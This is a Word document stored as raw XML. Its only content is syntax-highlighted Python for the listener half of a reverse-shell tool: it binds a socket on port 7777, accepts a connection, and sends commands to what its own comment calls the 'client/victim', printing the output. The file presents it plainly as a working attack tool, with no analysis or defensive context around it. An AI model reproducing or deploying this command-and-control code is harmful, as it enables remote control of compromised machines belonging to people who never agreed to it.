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F6" w:rsidRPr="00155EF6" w:rsidRDefault="00155EF6" w:rsidP="00155E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socket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sys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808080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Create a Socket (Connect two PC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00155EF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155EF6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFC66D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>create_socket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>try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global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host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global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port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global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s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host = </w:t>
      </w:r>
      <w:r w:rsidRPr="00155EF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155EF6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port = </w:t>
      </w:r>
      <w:r w:rsidRPr="00155EF6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="6897BB"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7777</w:t>
      </w:r>
      <w:r w:rsidRPr="00155EF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 =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socket.socket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except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socket.error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msg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55EF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55EF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"Socket creation error:"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155EF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msg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808080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Binding the socket and listening for connections</w:t>
      </w:r>
      <w:r w:rsidRPr="00155EF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155EF6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFC66D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bind_socket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>try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global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host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global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port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global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s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55EF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55EF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"Binding the port: "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155EF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(port))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s.bind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((host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port))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s.listen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55EF6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except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socket.error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msg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55EF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55EF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"Socket Binding error"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155EF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msg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+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00155EF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155EF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155EF6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="6A8759"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"Retrying..."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bind_socket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808080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Establish connection with a client (Socket must be listening)</w:t>
      </w:r>
      <w:r w:rsidRPr="00155EF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155EF6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFC66D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>socket_accept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conn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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address =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s.accept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55EF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55EF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"Connection has been established | "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155EF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"IP: |"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+ address[</w:t>
      </w:r>
      <w:r w:rsidRPr="00155EF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+ </w:t>
      </w:r>
      <w:r w:rsidRPr="00155EF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"Port: |" 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155EF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(address[</w:t>
      </w:r>
      <w:r w:rsidRPr="00155EF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]))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send_commands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conn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conn.close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808080"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t># Send command to client/victim:</w:t>
      </w:r>
      <w:r w:rsidRPr="00155EF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155EF6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FFC66D"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>send_commands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conn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>while True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cmd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155EF6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cmd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155EF6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="6A8759"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"quit"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conn.close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s.close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sys.exit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155EF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55EF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.encode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cmd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)) &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00155EF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conn.send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55EF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.encode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cmd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client_response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155EF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conn.recv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55EF6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="6897BB"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1024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55EF6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="6A8759"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"utf-8"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55EF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client_response</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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155EF6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="AA4926"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>end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155EF6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155EF6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():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create_socket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bind_socket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socket_accept</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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55EF6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="A9B7C6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>main()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00505A1C" w:rsidRDefault="00505A1C"/>
    <w:sectPr w:rsidR="00505A1C" w:rsidSect="0050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EF6"/>
    <w:rsid w:val="00155EF6"/>
    <w:rsid w:val="0050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3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DIU</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-06-16T05:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-06-16T05:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>